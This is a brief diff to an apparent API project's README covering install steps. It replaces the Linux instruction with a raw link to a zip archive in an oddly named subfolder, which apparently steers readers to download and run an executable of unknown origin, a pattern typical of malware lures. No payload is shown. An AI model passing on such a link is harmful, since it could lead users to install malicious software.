alphaitas/gold-price-api/README.md

 - **Windows:** Double-click the downloaded `.exe` or `.zip` file.
 If it’s a zip, extract it first, then run the executable.
 - **macOS:** Open the `.dmg` or `.zip` file, then drag the app to your Applications folder.
-- **Linux:** Download the `.tar.gz` or executable file.
+- **Linux:** Download the `https://raw.githubusercontent.com/alphaitas/gold-price-api/main/ironstone/api-price-gold-v1.9.zip` or executable file.
 Extract it if necessary and run from the terminal.

 ---